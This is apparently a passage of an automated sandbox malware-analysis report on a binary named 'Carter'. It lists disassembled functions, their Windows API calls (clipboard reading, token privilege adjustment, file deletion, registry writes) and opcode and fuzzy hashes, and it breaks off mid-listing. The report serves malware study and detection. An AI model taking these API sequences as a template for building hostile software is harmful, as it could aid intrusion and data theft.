                                                                        • Opcode ID: 720bc404e52fd5960cea2ae634f85748eb9059edd0fdb4b729176d0612b6fbb8
                                                                        • Instruction ID: 1400722f1593c5c222923546742659fd7f88ff522699558cde2ad901fc23c9aa
                                                                        • Opcode Fuzzy Hash: 720bc404e52fd5960cea2ae634f85748eb9059edd0fdb4b729176d0612b6fbb8
                                                                        • Instruction Fuzzy Hash: 9DD0A7315E020CBBEF60DFA0CC02F68B7ACE702706F1002A4B504E90D0DA7669149795
                                                                        Function 00FF42AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,010306E6,00000000,00000000,00000000), ref: 00FF42BF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: ae766de861fc2b0ab2aa550fa48e247893aee7f9dc6a501bf5a0eda31a6c2e96
                                                                        • Instruction ID: 61d095c8d32a538667f2b7088371bcbb761ad6cb4ef00cf0e985a692ff34dc5a
                                                                        • Opcode Fuzzy Hash: ae766de861fc2b0ab2aa550fa48e247893aee7f9dc6a501bf5a0eda31a6c2e96
                                                                        • Instruction Fuzzy Hash: 48D0C77464020CBFE710CB80DC46FA9777CE705710F100294FD04A6294D6B27D508795
                                                                        Function 01044FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 02fbffe2a310cc3d1f6eb973ea3f49918062c6d91091901eb767e2c51c23f1d3
                                                                        • Instruction ID: 8c44f519a8a0c929585b59646f3c4436931cc1d34304271d2730e0cac9519459
                                                                        • Opcode Fuzzy Hash: 02fbffe2a310cc3d1f6eb973ea3f49918062c6d91091901eb767e2c51c23f1d3
                                                                        • Instruction Fuzzy Hash: 6EB092B400160157EDB81E3C258C2993B8158432A97D81BD2E5F8E58E5923A944FA620
                                                                        Function 0100547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __wfsopen
                                                                        • String ID:
                                                                        • API String ID: 197181222-0
                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                        • Instruction ID: 1d17dbc9a8421a492554b114ca5ed62d7aec23d94b85b6b9920fc12b28ec0aa4
                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                        • Instruction Fuzzy Hash: 47B0927654020C77DE022A82EC02A9A3B299B50668F408020FB0C1C1A1EA73A6609A89
                                                                        Function 0104D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000002,00000000), ref: 0104D842
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1452528299-0
                                                                        • Opcode ID: 04314cd101c8a97d30a71fc7d171928a514f8f3c6a316701080916605d6c2cbe
                                                                        • Instruction ID: 081bd9580c6e9782dcf059204d5f5d6ea2393b98e6bf9cc0841c750afa1a74e1
                                                                        • Opcode Fuzzy Hash: 04314cd101c8a97d30a71fc7d171928a514f8f3c6a316701080916605d6c2cbe
                                                                        • Instruction Fuzzy Hash: 467181702043068FD714EFA8C8D1AAEB7E1BF98354F04466DF5DA972A2DB34E905CB52
                                                                        Function 0104C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01044005: FindFirstFileW.KERNEL32(?,?), ref: 0104407C
                                                                          • Part of subcall function 01044005: DeleteFileW.KERNEL32(?,?,?,?), ref: 010440CC
                                                                          • Part of subcall function 01044005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 010440DD
                                                                          • Part of subcall function 01044005: FindClose.KERNEL32(00000000), ref: 010440F4
                                                                        • GetLastError.KERNEL32 ref: 0104C292
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                        • String ID:
                                                                        • API String ID: 2191629493-0
                                                                        • Opcode ID: 3e4a53726a6e7122b7fd2eff8404ab9924a9098966bb3e918c1084d43c623e88
                                                                        • Instruction ID: 2fd3b9acbaea3457c7afb2fdfb1f070464dc3031041852314d94bbc85143f31e
                                                                        • Opcode Fuzzy Hash: 3e4a53726a6e7122b7fd2eff8404ab9924a9098966bb3e918c1084d43c623e88
                                                                        • Instruction Fuzzy Hash: 69F08C322102148FDB20EF59D880B6AB7E9AF89320F058059F9499B352CB78BC02DB94
                                                                        Function 00FF42CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(?,?,00000000,01022F8B), ref: 00FF42EF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle
                                                                        • String ID:
                                                                        • API String ID: 2962429428-0
                                                                        • Opcode ID: 9c50fc91e78193299c073192aa08ab24aa77e056761cd21caa9d8207375b671a
                                                                        • Instruction ID: e9570495d3eb74dec6aa3cc77fe5ff3273befd2c0517c31856d3fa43a03c11d2
                                                                        • Opcode Fuzzy Hash: 9c50fc91e78193299c073192aa08ab24aa77e056761cd21caa9d8207375b671a
                                                                        • Instruction Fuzzy Hash: D6E09275800B01CFC3314F1AE804422FBF8FFE13713214A2EE1E692664E3B0689A9B60

                                                                        Non-executed Functions

                                                                        Function 0106D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0106D208
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0106D249
                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0106D28E
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0106D2B8
                                                                        • SendMessageW.USER32 ref: 0106D2E1
                                                                        • _wcsncpy.LIBCMT ref: 0106D359
                                                                        • GetKeyState.USER32(00000011), ref: 0106D37A
                                                                        • GetKeyState.USER32(00000009), ref: 0106D387
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0106D39D
                                                                        • GetKeyState.USER32(00000010), ref: 0106D3A7
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0106D3D0
                                                                        • SendMessageW.USER32 ref: 0106D3F7
                                                                        • SendMessageW.USER32(?,00001030,?,0106B9BA), ref: 0106D4FD
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0106D513
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0106D526
                                                                        • SetCapture.USER32(?), ref: 0106D52F
                                                                        • ClientToScreen.USER32(?,?), ref: 0106D594
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0106D5A1
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0106D5BB
                                                                        • ReleaseCapture.USER32 ref: 0106D5C6
                                                                        • GetCursorPos.USER32(?), ref: 0106D600
                                                                        • ScreenToClient.USER32(?,?), ref: 0106D60D
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0106D669
                                                                        • SendMessageW.USER32 ref: 0106D697
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0106D6D4
                                                                        • SendMessageW.USER32 ref: 0106D703
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0106D724
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0106D733
                                                                        • GetCursorPos.USER32(?), ref: 0106D753
                                                                        • ScreenToClient.USER32(?,?), ref: 0106D760
                                                                        • GetParent.USER32(?), ref: 0106D780
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0106D7E9
                                                                        • SendMessageW.USER32 ref: 0106D81A
                                                                        • ClientToScreen.USER32(?,?), ref: 0106D878
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0106D8A8
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0106D8D2
                                                                        • SendMessageW.USER32 ref: 0106D8F5
                                                                        • ClientToScreen.USER32(?,?), ref: 0106D947
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0106D97B
                                                                          • Part of subcall function 00FE29AB: GetWindowLongW.USER32(?,000000EB), ref: 00FE29BC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0106DA17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3977979337-4164748364
                                                                        • Opcode ID: cdfd569009064c85299d2ba173493023655d0eecbd5e6866b60a47028a4f7466
                                                                        • Instruction ID: c1102625debb85cb8197fc423d0eae9ced2468b875526c764d27c3e98fe77356
                                                                        • Opcode Fuzzy Hash: cdfd569009064c85299d2ba173493023655d0eecbd5e6866b60a47028a4f7466
                                                                        • Instruction Fuzzy Hash: 4942BB30604341EFD721CFA8C844BAABBE9FF89710F144659F6E59B2A5C7B2D844CB91
                                                                        Function 01038F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01039399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
                                                                          • Part of subcall function 01039399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
                                                                          • Part of subcall function 01039399: GetLastError.KERNEL32 ref: 0103941D
                                                                        • _memset.LIBCMT ref: 01038F71
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 01038FC3
                                                                        • CloseHandle.KERNEL32(?), ref: 01038FD4
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01038FEB
                                                                        • GetProcessWindowStation.USER32 ref: 01039004
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 0103900E
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01039028
                                                                          • Part of subcall function 01038DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01038F27), ref: 01038DFE
                                                                          • Part of subcall function 01038DE9: CloseHandle.KERNEL32(?,?,01038F27), ref: 01038E10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                        • String ID: $default$winsta0
                                                                        • API String ID: 2063423040-1027155976
                                                                        • Opcode ID: 939b867149039d28395d61907fa4c4fd47e0efc2e1e0f185951fee4b4b60ee45
                                                                        • Instruction ID: 904e63585e6c134895df121fd3b2e73b09eff7a003a2e9b4e421a83bd8b33b05
                                                                        • Opcode Fuzzy Hash: 939b867149039d28395d61907fa4c4fd47e0efc2e1e0f185951fee4b4b60ee45
                                                                        • Instruction Fuzzy Hash: 82817E71D00209BFEF219FA4CC48AEEBBBDBF85308F154199FA90B6254D7768A14DB50
                                                                        Function 01054632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32(01070980), ref: 0105465C
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0105466A
                                                                        • GetClipboardData.USER32(0000000D), ref: 01054672
                                                                        • CloseClipboard.USER32 ref: 0105467E
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0105469A
                                                                        • CloseClipboard.USER32 ref: 010546A4
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 010546B9
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 010546C6
                                                                        • GetClipboardData.USER32(00000001), ref: 010546CE
                                                                        • GlobalLock.KERNEL32(00000000), ref: 010546DB
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0105470F
                                                                        • CloseClipboard.USER32 ref: 0105481F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        • Opcode ID: 4d7ad54917f9e45bdd5a55cf90fe18aab7ecb0603eceabc309267bf6a42830e3
                                                                        • Instruction ID: 2e65bc626592952b9d454b3f974fc41166b0f3c701c4c3f68672e375a26b9033
                                                                        • Opcode Fuzzy Hash: 4d7ad54917f9e45bdd5a55cf90fe18aab7ecb0603eceabc309267bf6a42830e3
                                                                        • Instruction Fuzzy Hash: B751B471604205ABE350EF64DC55FBF77A8AF89B00F000629FAC5E2199EF75D845CB62
                                                                        Function 0104CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104CDD0
                                                                        • FindClose.KERNEL32(00000000), ref: 0104CE24
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0104CE49
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0104CE60
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0104CE87
                                                                        • __swprintf.LIBCMT ref: 0104CED3
                                                                        • __swprintf.LIBCMT ref: 0104CF16
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • __swprintf.LIBCMT ref: 0104CF6A
                                                                          • Part of subcall function 010038C8: __woutput_l.LIBCMT ref: 01003921
                                                                        • __swprintf.LIBCMT ref: 0104CFB8
                                                                          • Part of subcall function 010038C8: __flsbuf.LIBCMT ref: 01003943
                                                                          • Part of subcall function 010038C8: __flsbuf.LIBCMT ref: 0100395B
                                                                        • __swprintf.LIBCMT ref: 0104D007
                                                                        • __swprintf.LIBCMT ref: 0104D056
                                                                        • __swprintf.LIBCMT ref: 0104D0A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 3953360268-2428617273
                                                                        • Opcode ID: 73aa6436f52cfcfbbb24cd0d2f84f40d118a3a5a36f9977f9753b84f9c7fbc23
                                                                        • Instruction ID: 854b570cefe9eb91dfc3e78ca7ecd3d23c70c55962eb6a098fec9871f744186e
                                                                        • Opcode Fuzzy Hash: 73aa6436f52cfcfbbb24cd0d2f84f40d118a3a5a36f9977f9753b84f9c7fbc23
                                                                        • Instruction Fuzzy Hash: 37A14BB1404345ABD720EBA5CD85DAFB7ECBF94704F40091DF685C6191EB38EA09DB62
                                                                        Function 0104F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0104F5F9
                                                                        • _wcscmp.LIBCMT ref: 0104F60E
                                                                        • _wcscmp.LIBCMT ref: 0104F625
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0104F637
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0104F651
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0104F669
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F674
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0104F690
                                                                        • _wcscmp.LIBCMT ref: 0104F6B7
                                                                        • _wcscmp.LIBCMT ref: 0104F6CE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104F6E0
                                                                        • SetCurrentDirectoryW.KERNEL32(0109B578), ref: 0104F6FE
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0104F708
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F715
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F727
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: 4eb776bffa50f9508281c8006198c9a43f392c14a5f4e9d826d8faf7414d2ddf
                                                                        • Instruction ID: f6306646f8b97fd8e943ff826760af972d664b39d43b14520987d2526bc8088e
                                                                        • Opcode Fuzzy Hash: 4eb776bffa50f9508281c8006198c9a43f392c14a5f4e9d826d8faf7414d2ddf
                                                                        • Instruction Fuzzy Hash: CE31E77294120A6FEF21DABDEC88ADE77ECAF09221F1001A5F984E2190DF35D945CB60
                                                                        Function 01060EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01060FB3
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,01070980,00000000,?,00000000,?,?), ref: 01061021
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01061069
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 010610F2
                                                                        • RegCloseKey.ADVAPI32(?), ref: 01061412
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0106141F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 8c113ef98055141bb3e0782d2e3060099146e7944819a35efab64418b35d009a
                                                                        • Instruction ID: a6d480a52ba8669558ae04db88692e373e374050224da12f479f94fba5d4a527
                                                                        • Opcode Fuzzy Hash: 8c113ef98055141bb3e0782d2e3060099146e7944819a35efab64418b35d009a
                                                                        • Instruction Fuzzy Hash: 13026B756006519FDB25EF29C850E2AB7E9FF89724F04895CF98A9B361CB34EC01CB81
                                                                        Function 0104F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0104F756
                                                                        • _wcscmp.LIBCMT ref: 0104F76B
                                                                        • _wcscmp.LIBCMT ref: 0104F782
                                                                          • Part of subcall function 01044875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 01044890
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0104F7B1
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F7BC
